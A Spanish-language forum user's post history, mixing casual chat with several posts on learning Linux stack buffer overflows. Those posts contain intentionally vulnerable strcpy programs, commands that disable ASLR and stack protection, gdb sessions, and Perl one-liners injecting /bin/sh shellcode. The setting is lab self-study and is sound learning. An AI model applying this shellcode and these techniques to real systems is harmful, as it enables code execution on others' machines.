Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Belial & Grimoire

#241
mmm este año veo puros finales

el fin con mi novia, el fin de dr. house y ahora el fin de WHK... y ahora que sigue?... el fin del mundo?

bueno, por cualquier cosa yo tambien me despido de ti WHK, aprendi mucho de tus temas ojala algun dia regreses

salu2 y cuidate
#242
hola

pues ya casi no uso windows pero la pequeña particion que tengo aunque no me guste, tengo un antivirus gratuito

yo creo que Essential tiene su ventaja y su desventaja

ventaja: quien mejor que microsoft para conocer sus propias herramientas y sistemas operativos y para conocer bien como podria funcionar un antivirus en windows, yo creo que essential tendria una gran ventaja para saber cosas que incluso ellos por su codigo cerrado solo deben de saber

desventaja: ellos no son una empresa dedicada a los antivirus, es una rama mas para vender, asi que no podemos estar completamente seguros que este lo suficientemente bien programado para detectar muchas cosas que los antivirus que se dedican solo a eso saben hacer, incluso no se a que grado tenga una base de datos sobre los virus que hay como para confiar en su heuristica y demas funciones

bueno, es mi opinion aunque como te menciono, utilizo el mejor antivirus de todos... linux jeje  ;D, y en windows creo es avast, es que casi no entro y no recuerdo cual instale

salu2
#243
hola Ivanchunk

pues ya intente ponerle un break a strcpy y no me da nada

tambien me di cuenta que me habia faltado

-z execstack

pero tampoco es ese el problema, ya no se que mas podria estar saliendo mal, alguna sugerencia?

salu2

------------------------

P.D.

ya estoy intentando con ubuntu 9.04 por si talvez era alguna actualizacion pero estoy teniendo el mismo problema

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int vuln(char *buff){

char buffer[36];
strcpy(buffer, buff);
}

int main(int argc, char *argv[]){

vuln(argv[1]);

}
#244
bueno ya creo logre avanzar pero ahora tengo el problema que no logre hacer funcionar el exploit

les dire los pasos que hago para ver si me pueden ayudar mas facilmente

primero desactivo randomize_va_space

Citarcat /proc/sys/kernel/randomize_va_space
0

compilo el archivo vulnerable de esta manera

Citargcc -ggdb --no-stack-protector vuln.c -o vuln

ejecuto gdb y meto la cantidad de "A" que son necesarios

Citar$(perl -e 'print "A" x 44 . "B" x 4')

Citar(gdb) i r eip ebp
eip            0x42424242   0x42424242
ebp            0x41414141   0x41414141
(gdb)

lo que quiere decir que si pongo una shell tendria que quedar... "A" = 44 - 25 = 19

Citar$(perl -e 'print "A" x 19 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "B" x 4')

Citar
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) i r eip ebp
eip            0x42424242   0x42424242
ebp            0x80cd0bb0   0x80cd0bb0

Aqui es donde tengo que buscar donde esta RET, lo hago de esta manera

Citar$(perl -e 'print "A" x 19 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "B" x 4')

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) br overflow
Breakpoint 1 at 0x80483ea: file vuln.c, line 6.
(gdb) r AAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln AAA

Breakpoint 1, overflow (badbeef=0xbffff602 "AAA") at vuln.c:6
6      strcpy(buffer, badbeef);
(gdb) x/x buffer
0xbffff380:   0x00000000
(gdb)

al parecer es 0xbffff380: 0x00000000

pero aqui viene el problema si pongo eso no me aparce ninguna shell, que podria estar mal?

Citar$(perl -e 'print "\x90" x 19 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x80\xf3\xff\xbf"')

Program received signal SIGSEGV, Segmentation fault.
0xbffff380 in ?? ()
(gdb) c
Continuing.

Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb)


espero me puedan ayudar, abajo les dejo el codigo del archivo vulnerable

salu2

#include <stdio.h>
#include <string.h>

void overflow(char *badbeef){
char buffer[32];
strcpy(buffer, badbeef);
}

int main(int argc, char *argv[]){
overflow(argv[1]);
return 0;
}
#245
no entiendo porke razon al quitar esto me sale ya bien

Citar-z execstack

#246
Hacking / Re: Concurso Nº1: "Hack My Server"
16 Mayo 2012, 21:28 PM
 ;-) jeje, que bien logre ganar algo por primea vez en este foro

gracias

jeje soy solo uno... belial es mi nick, pero de broma me dicen, que parece que soy bipolar  :silbar: y lo llame grimoire

esa es la unica razon por la que soy belial & grimoire, pero solo soy uno jeje


pero vamos a lo importante... y mi cerveza?  ;D jaja
#247
hola

una duda... en un tuto de Garfield07, al usar gdb y poner un break en una funcion al usar este comando le aparece el RET

Breakpoint 1, vuln (buff=0xbffffb5f "AAA") at vuln.c:8
8        strcpy (buffer, buff);
(gdb) x/x buffer
0xbffff904:    0x00000000


pero yo al hacerlo me aparece diferente

Citar(gdb) r $(perl -e 'print "\x90" x 23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "XXXX"')Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln $(perl -e 'print "\x90" x 23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "XXXX"')

Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) br vuln
Breakpoint 1 at 0x804845a: file vuln.c, line 8.
(gdb) r AAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln AAA

Breakpoint 1, vuln (buff=0xbffff604 "AAA") at vuln.c:8
8       strcpy (buffer, buff);
(gdb) x/x buffer
0xbffff37c:   0xb7fbfff4

y al continuar con la execucion para visualizar la shell me aparece esto

(gdb) r $(perl -e 'print "\x90" x 23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x7c\xf3\xff\xbf"')
Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln $(perl -e 'print "\x90" x 23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x7c\xf3\xff\xbf"')

Breakpoint 1, vuln (
   buff=0xbffff5d3 "\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\061\300Ph//shh/bin\211\343P\211\342S\211\341\260\v̀|\363\377\277") at vuln.c:8
8    strcpy (buffer, buff);
(gdb) c
Continuing.

Program received signal SIGILL, Illegal instruction.
0xbffff37e in ?? ()


al principio me llamo la atencion "Illegal instruccion" asi que use x/x buff y me salio

0xbffff604: 0x00414141


asi que a los NOP le aumente a "r AAAA" y me aparce

0xbffff603: 0x41414141


no se si eso tenga algo que ver, igual el ret me aparece igual

alguien sabe que podria salir mal o que otra manera podria encontrar RET?

como informacion adicional uso debian con gcc-4.6
#248
Hacking / Re: Concurso Nº1: "Hack My Server"
14 Mayo 2012, 20:31 PM
jeje ya se esta planeando otro sobre wordpress... que bien, solo que antes de ese, me podrian mandar la constraseña de plesk jeje es que no me llega o no se si ya no esta disponible o que paso?

salu2
#249
a ya, si faltaba ggdb no me acordaba de ese comando, solo de las protecciones

--no-stack-protector -z execstack


gracias
#250
hola

estaba practicando sobre exploits en linux

ya entendi como hacer una shell con asm y obtener los opcodes, para hacer la shellcode usando nasm y hexadump, estuve leyendo el tuto de Smashing The Stack For Fun And Profit tambien

ahorita estaba recordando unos post sobre eso y quise volver a intentarlo

antes no me salia ciertas cosas que ya comprendi...

ahora tengo un problema con GDB, cuando uso este codigo

#include <stdio.h>
#include <string.h>

int vuln (char *buff)
{
   char buffer [36];
   strcpy (buffer, buff);
}

int main (int argc, char *argv [])
{
   vuln (argv [1]);
}

int feo ()
{
   printf ("Eres feo!!!");
   exit (0);
}


lo executo con gdb y coloco esto, en mi version debian le tuve que cambiar los nop's porque se necesitó mas

r $(perl -e 'print "\x90" x 23 . "B" x 25 . "XXXX"')

ahora me aparece esto correctamente

/vuln $(perl -e 'print "\x90" x 23 . "B" x 25 . "XXXX"')

Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()


aqui supuestamente me deberia de aparecer algo asi usando un break en la funcion vuln

(gdb) br vuln
Breakpoint 1 at 0x804842a: file vuln.c, line 8.
(gdb) r AAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/juanra/Escritorio/Shell/vuln AAA

Breakpoint 1, vuln (buff=0xbffffb5f "AAA") at vuln.c:8
8        strcpy (buffer, buff);


pero a mi no me sale eso, de hecho no sale nada

(gdb) br vuln
Breakpoint 1 at 0x804845a
(gdb) r AAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln AAA

Breakpoint 1, 0x0804845a in vuln ()



que podria estar saliendo mal, ya intente incluso usar el break con buff y buffer y tampoco

espero me puedan ayudar, porque apenas estoy tratando de entender como encontrar el RET para el exploit

salu2